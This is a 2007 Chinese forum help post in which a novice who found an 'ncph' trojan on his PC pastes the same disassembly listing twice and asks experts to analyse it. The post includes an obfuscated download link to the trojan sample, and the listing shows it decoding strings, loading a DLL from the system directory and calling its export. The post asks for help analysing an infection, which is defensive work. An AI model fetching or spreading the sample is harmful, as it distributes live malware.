-
-
[旧帖] [求助]中招了高手来分析下 0.00雪花
-
发表于: 2007-8-5 14:29
-
木马下载地址:708K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3y4*7i4K6u0W2L8$3&6D9K9h3&6W2k6r3!0%4L8W2)9J5k6h3&6W2N6q4)9J5c8X3c8G2N6$3&6Q4x3V1k6F1j5%4m8Z5P5h3D9#2i4K6u0W2x3q4u0W2L8r3g2S2M7$3g2Q4x3X3g2J5j5i4t1`.
电脑莫名重启后扫毒扫出个ncph 本人是个新手 分析一点弄不下去了
高手来分析下
00403E6C > $ 55 push ebp
00403E6D . 8BEC mov ebp, esp
00403E6F . 83C4 D4 add esp, -2C
00403E72 . 53 push ebx
00403E73 . 56 push esi
00403E74 . 33C0 xor eax, eax
00403E76 . 8945 D4 mov dword ptr [ebp-2C], eax
00403E79 . 8945 D8 mov dword ptr [ebp-28], eax
00403E7C . 8945 DC mov dword ptr [ebp-24], eax
00403E7F . B8 243E4000 mov eax, 00403E24
00403E84 . E8 EFF4FFFF call 00403378
00403E89 . BE 24684000 mov esi, 00406824
00403E8E . 33C0 xor eax, eax
00403E90 . 55 push ebp
00403E91 . 68 9D3F4000 push 00403F9D
00403E96 . 64:FF30 push dword ptr fs:[eax]
00403E99 . 64:8920 mov dword ptr fs:[eax], esp
00403E9C . B3 01 mov bl, 1
00403E9E . 68 9C504000 push 0040509C ; /pBufCount = ag.0040509C
00403EA3 . 68 20674000 push 00406720 ; |Buffer = ag.00406720
00403EA8 . E8 7FF5FFFF call <jmp.&advapi32.GetUserNameA> ; \GetUserNameA
00403EAD . 68 AC3F4000 push 00403FAC ; /String2 = "SYSTEM"
00403EB2 . 68 20674000 push 00406720 ; |String1 = ""
00403EB7 . E8 40F6FFFF call <jmp.&kernel32.lstrcmpA> ; \lstrcmpA
00403EBC . 85C0 test eax, eax
00403EBE . EB 02 jmp short 00403EC2
00403EC0 . 33DB xor ebx, ebx
00403EC2 > 8BC3 mov eax, ebx
00403EC4 . 34 01 xor al, 1
00403EC6 . 84C0 test al, al
00403EC8 . 74 05 je short 00403ECF
00403ECA . E8 0DF7FFFF call 004035DC
00403ECF > 8BC3 mov eax, ebx
00403ED1 . 34 01 xor al, 1
00403ED3 . 84C0 test al, al
00403ED5 . 74 05 je short 00403EDC
00403ED7 . E8 14F8FFFF call 004036F0
00403EDC > 80F3 01 xor bl, 1
00403EDF . 84DB test bl, bl
00403EE1 . 0F85 9B000000 jnz 00403F82
00403EE7 . E8 CCFCFFFF call 00403BB8
00403EEC . 84C0 test al, al
00403EEE . 0F85 8E000000 jnz 00403F82
00403EF4 . 68 00100000 push 1000 ; /BufSize = 1000 (4096.)
00403EF9 . 56 push esi ; |Buffer
00403EFA . E8 A5F5FFFF call <jmp.&kernel32.GetSystemDirector>; \GetSystemDirectoryA
00403EFF . 6A 01 push 1
00403F01 . 8975 E0 mov dword ptr [ebp-20], esi
00403F04 . C645 E4 05 mov byte ptr [ebp-1C], 5
00403F08 . 8D55 DC lea edx, dword ptr [ebp-24]
00403F0B . B8 BC3F4000 mov eax, 00403FBC ; ASCII "LCECFDNCICPFGFPELEFCNCNC"
00403F10 . E8 C3F9FFFF call 004038D8
00403F15 . 8B45 DC mov eax, dword ptr [ebp-24]
00403F18 . E8 3BF1FFFF call 00403058
00403F1D . 8945 E8 mov dword ptr [ebp-18], eax ; |
00403F20 . C645 EC 06 mov byte ptr [ebp-14], 6 ; |
00403F24 . 8D45 E0 lea eax, dword ptr [ebp-20] ; |
00403F27 . 50 push eax ; |Arg3
00403F28 . 68 D83F4000 push 00403FD8 ; |Arg2 = 00403FD8 ASCII "%s\%s"
00403F2D . 56 push esi ; |Arg1
00403F2E . E8 CDF8FFFF call 00403800 ; \ag.00403800
00403F33 . 8D55 D8 lea edx, dword ptr [ebp-28]
00403F36 . B8 E83F4000 mov eax, 00403FE8 ; ASCII "FCNCNCDCICNCEC"
00403F3B . E8 98F9FFFF call 004038D8
00403F40 . 8B45 D8 mov eax, dword ptr [ebp-28]
00403F43 . E8 10F1FFFF call 00403058
00403F48 . 8BD6 mov edx, esi
00403F4A . E8 51FAFFFF call 004039A0
00403F4F . 8BC6 mov eax, esi
00403F51 . E8 EAFAFFFF call 00403A40
00403F56 . 56 push esi ; /FileName
00403F57 . E8 50F5FFFF call <jmp.&kernel32.LoadLibraryA> ; \LoadLibraryA
00403F5C . 8BD8 mov ebx, eax
00403F5E . 8D55 D4 lea edx, dword ptr [ebp-2C]
00403F61 . B8 00404000 mov eax, 00404000 ; ASCII "GCAEBJAGBJIICDBJEILI"
00403F66 . E8 6DF9FFFF call 004038D8
00403F6B . 8B45 D4 mov eax, dword ptr [ebp-2C]
00403F6E . E8 E5F0FFFF call 00403058
00403F73 . 50 push eax ; /ProcNameOrOrdinal
00403F74 . 53 push ebx ; |hModule
00403F75 . E8 22F5FFFF call <jmp.&kernel32.GetProcAddress> ; \GetProcAddress
00403F7A . 8BD8 mov ebx, eax
00403F7C . 85DB test ebx, ebx
00403F7E . 74 02 je short 00403F82
00403F80 . FFD3 call ebx
00403F82 > 33C0 xor eax, eax
00403F84 . 5A pop edx
00403F85 . 59 pop ecx
00403F86 . 59 pop ecx
00403F87 . 64:8910 mov dword ptr fs:[eax], edx
00403F8A . 68 A43F4000 push 00403FA4
00403F8F > 8D45 D4 lea eax, dword ptr [ebp-2C]
00403F92 . BA 03000000 mov edx, 3
00403F97 . E8 1CEFFFFF call 00402EB8
00403F9C . C3 retn
00403F9D .^ E9 8EE9FFFF jmp 00402930
00403FA2 .^ EB EB jmp short 00403F8F
电脑莫名重启后扫毒扫出个ncph 本人是个新手 分析一点弄不下去了
高手来分析下
00403E6C > $ 55 push ebp
00403E6D . 8BEC mov ebp, esp
00403E6F . 83C4 D4 add esp, -2C
00403E72 . 53 push ebx
00403E73 . 56 push esi
00403E74 . 33C0 xor eax, eax
00403E76 . 8945 D4 mov dword ptr [ebp-2C], eax
00403E79 . 8945 D8 mov dword ptr [ebp-28], eax
00403E7C . 8945 DC mov dword ptr [ebp-24], eax
00403E7F . B8 243E4000 mov eax, 00403E24
00403E84 . E8 EFF4FFFF call 00403378
00403E89 . BE 24684000 mov esi, 00406824
00403E8E . 33C0 xor eax, eax
00403E90 . 55 push ebp
00403E91 . 68 9D3F4000 push 00403F9D
00403E96 . 64:FF30 push dword ptr fs:[eax]
00403E99 . 64:8920 mov dword ptr fs:[eax], esp
00403E9C . B3 01 mov bl, 1
00403E9E . 68 9C504000 push 0040509C ; /pBufCount = ag.0040509C
00403EA3 . 68 20674000 push 00406720 ; |Buffer = ag.00406720
00403EA8 . E8 7FF5FFFF call <jmp.&advapi32.GetUserNameA> ; \GetUserNameA
00403EAD . 68 AC3F4000 push 00403FAC ; /String2 = "SYSTEM"
00403EB2 . 68 20674000 push 00406720 ; |String1 = ""
00403EB7 . E8 40F6FFFF call <jmp.&kernel32.lstrcmpA> ; \lstrcmpA
00403EBC . 85C0 test eax, eax
00403EBE . EB 02 jmp short 00403EC2
00403EC0 . 33DB xor ebx, ebx
00403EC2 > 8BC3 mov eax, ebx
00403EC4 . 34 01 xor al, 1
00403EC6 . 84C0 test al, al
00403EC8 . 74 05 je short 00403ECF
00403ECA . E8 0DF7FFFF call 004035DC
00403ECF > 8BC3 mov eax, ebx
00403ED1 . 34 01 xor al, 1
00403ED3 . 84C0 test al, al
00403ED5 . 74 05 je short 00403EDC
00403ED7 . E8 14F8FFFF call 004036F0
00403EDC > 80F3 01 xor bl, 1
00403EDF . 84DB test bl, bl
00403EE1 . 0F85 9B000000 jnz 00403F82
00403EE7 . E8 CCFCFFFF call 00403BB8
00403EEC . 84C0 test al, al
00403EEE . 0F85 8E000000 jnz 00403F82
00403EF4 . 68 00100000 push 1000 ; /BufSize = 1000 (4096.)
00403EF9 . 56 push esi ; |Buffer
00403EFA . E8 A5F5FFFF call <jmp.&kernel32.GetSystemDirector>; \GetSystemDirectoryA
00403EFF . 6A 01 push 1
00403F01 . 8975 E0 mov dword ptr [ebp-20], esi
00403F04 . C645 E4 05 mov byte ptr [ebp-1C], 5
00403F08 . 8D55 DC lea edx, dword ptr [ebp-24]
00403F0B . B8 BC3F4000 mov eax, 00403FBC ; ASCII "LCECFDNCICPFGFPELEFCNCNC"
00403F10 . E8 C3F9FFFF call 004038D8
00403F15 . 8B45 DC mov eax, dword ptr [ebp-24]
00403F18 . E8 3BF1FFFF call 00403058
00403F1D . 8945 E8 mov dword ptr [ebp-18], eax ; |
00403F20 . C645 EC 06 mov byte ptr [ebp-14], 6 ; |
00403F24 . 8D45 E0 lea eax, dword ptr [ebp-20] ; |
00403F27 . 50 push eax ; |Arg3
00403F28 . 68 D83F4000 push 00403FD8 ; |Arg2 = 00403FD8 ASCII "%s\%s"
00403F2D . 56 push esi ; |Arg1
00403F2E . E8 CDF8FFFF call 00403800 ; \ag.00403800
00403F33 . 8D55 D8 lea edx, dword ptr [ebp-28]
00403F36 . B8 E83F4000 mov eax, 00403FE8 ; ASCII "FCNCNCDCICNCEC"
00403F3B . E8 98F9FFFF call 004038D8
00403F40 . 8B45 D8 mov eax, dword ptr [ebp-28]
00403F43 . E8 10F1FFFF call 00403058
00403F48 . 8BD6 mov edx, esi
00403F4A . E8 51FAFFFF call 004039A0
00403F4F . 8BC6 mov eax, esi
00403F51 . E8 EAFAFFFF call 00403A40
00403F56 . 56 push esi ; /FileName
00403F57 . E8 50F5FFFF call <jmp.&kernel32.LoadLibraryA> ; \LoadLibraryA
00403F5C . 8BD8 mov ebx, eax
00403F5E . 8D55 D4 lea edx, dword ptr [ebp-2C]
00403F61 . B8 00404000 mov eax, 00404000 ; ASCII "GCAEBJAGBJIICDBJEILI"
00403F66 . E8 6DF9FFFF call 004038D8
00403F6B . 8B45 D4 mov eax, dword ptr [ebp-2C]
00403F6E . E8 E5F0FFFF call 00403058
00403F73 . 50 push eax ; /ProcNameOrOrdinal
00403F74 . 53 push ebx ; |hModule
00403F75 . E8 22F5FFFF call <jmp.&kernel32.GetProcAddress> ; \GetProcAddress
00403F7A . 8BD8 mov ebx, eax
00403F7C . 85DB test ebx, ebx
00403F7E . 74 02 je short 00403F82
00403F80 . FFD3 call ebx
00403F82 > 33C0 xor eax, eax
00403F84 . 5A pop edx
00403F85 . 59 pop ecx
00403F86 . 59 pop ecx
00403F87 . 64:8910 mov dword ptr fs:[eax], edx
00403F8A . 68 A43F4000 push 00403FA4
00403F8F > 8D45 D4 lea eax, dword ptr [ebp-2C]
00403F92 . BA 03000000 mov edx, 3
00403F97 . E8 1CEFFFFF call 00402EB8
00403F9C . C3 retn
00403F9D .^ E9 8EE9FFFF jmp 00402930
00403FA2 .^ EB EB jmp short 00403F8F
